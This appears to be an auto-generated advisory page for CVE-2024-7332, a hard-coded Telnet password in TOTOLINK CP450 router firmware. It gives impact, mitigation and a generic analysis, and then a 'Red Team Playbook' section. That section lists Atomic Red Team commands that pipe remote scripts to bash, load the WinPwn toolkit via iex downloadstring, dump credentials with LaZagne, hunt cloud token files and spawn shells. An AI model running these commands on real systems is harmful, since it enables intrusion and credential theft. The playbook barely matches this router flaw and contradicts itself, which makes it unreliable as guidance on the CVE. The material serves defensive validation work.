CVE-2024-7332
Overview
The vulnerability in TOTOLINK CP450 firmware version 4.1.0cu.747_B20191224 is a hard-coded password weakness within the Telnet Service component. Specifically, the flaw resides in the /web_cste/cgi-bin/product.ini file, which contains embedded credentials that are static and unchangeable. This design flaw in authentication management allows unauthorized access via Telnet without dynamic credential validation.
Vulnerability Description
A vulnerability was found in TOTOLINK CP450 4.1.0cu.747_B20191224. It has been classified as critical. This affects an unknown part of the file /web_cste/cgi-bin/product.ini of the component Telnet Service. The manipulation leads to use of hard-coded password. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273255. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Impact
An unauthenticated remote attacker can gain full administrative access to the TOTOLINK CP450 device via Telnet by exploiting the hard-coded credentials. This allows complete control over device configuration and potential lateral movement within the network. The attack requires only network access to the device’s Telnet port and no user interaction, as indicated by CVSS vector AV:N/AC:L/PR:N/UI:N. The critical severity (CVSS 9.8) reflects the high confidentiality, integrity, and availability impact of this vulnerability.
Solution
No official patch or advisory has been released by the vendor as of the latest disclosure. Users of TOTOLINK CP450 firmware 4.1.0cu.747_B20191224 should monitor https://vuldb.com/?id.273255 for updates. As a mitigation, disabling Telnet access or restricting network access to the device’s management interface is recommended until a firmware update addressing the hard-coded password is made available.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in the TOTOLINK CP450 firmware version 4.1.0cu.747_B20191224, specifically within the Telnet service component. This flaw is characterized by the presence of a hard-coded password within the configuration file located at /web_cste/cgi-bin/product.ini. Such a design oversight allows an attacker to gain unauthorized access to the device without needing to authenticate through standard means. The hard-coded nature of the password not only simplifies the attack process but also significantly increases the risk of exploitation, as the password can be easily discovered and utilized by malicious actors.
The primary attack vector for this vulnerability is remote exploitation, which means that an attacker does not need physical access to the device to initiate an attack. By leveraging the hard-coded password, an attacker can establish a Telnet session and gain control over the device. This could lead to various malicious activities, including but not limited to network eavesdropping, data manipulation, or even using the compromised device as a launching pad for further attacks within the network. Given the widespread deployment of TOTOLINK devices in both consumer and small business environments, the potential for mass exploitation is significant, especially since the exploit has already been disclosed publicly.
The real-world impact of this vulnerability can be profound, particularly for organizations that rely on TOTOLINK devices for their networking needs. Compromised devices can lead to data breaches, loss of sensitive information, and disruption of services. Furthermore, if attackers gain control of these devices, they can use them to pivot to other parts of the network, potentially compromising additional systems and data. The business risks associated with such incidents include reputational damage, financial losses due to remediation efforts, and potential legal ramifications stemming from data protection regulations. The critical nature of this vulnerability, underscored by its high CVSS score, necessitates immediate attention from affected users.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, they should conduct a thorough inventory of all networking devices, ensuring that any TOTOLINK CP450 devices running the affected firmware are identified. Regular vulnerability scanning and penetration testing can help in detecting any unauthorized access attempts or exploitation of the Telnet service. Additionally, organizations should consider disabling the Telnet service altogether if it is not required, as this would eliminate the attack vector. For devices that must remain operational, changing default configurations, applying firmware updates, and implementing strong access controls are essential steps to mitigate the risk.
In conclusion, the discovered vulnerability in the TOTOLINK CP450 firmware poses a significant threat to both individual users and organizations. The combination of a hard-coded password and remote exploitability creates a scenario ripe for exploitation. Organizations must take proactive measures to assess their exposure, implement detection mechanisms, and adopt robust security practices to safeguard their networks against potential attacks stemming from this critical vulnerability. The lack of response from the vendor further complicates the situation, emphasizing the need for users to take responsibility for their security posture in the face of such threats.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Totolink | Cp450 Firmware | 4.1.0cu.747_b20191224 |
cpe:2.3:o:totolink:cp450_firmware:4.1.0cu.747_b20191224:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-7332 |
| vuldb.com |
GitHub CVE
vdb-entry
|
https://vuldb.com/?id.273255 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.273255 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.378357 |
| github.com |
GitHub CVE
exploit
|
https://github.com/abcdefg-png/IoT-vulnerable/blob/main/TOTOLINK/CP450/product.md |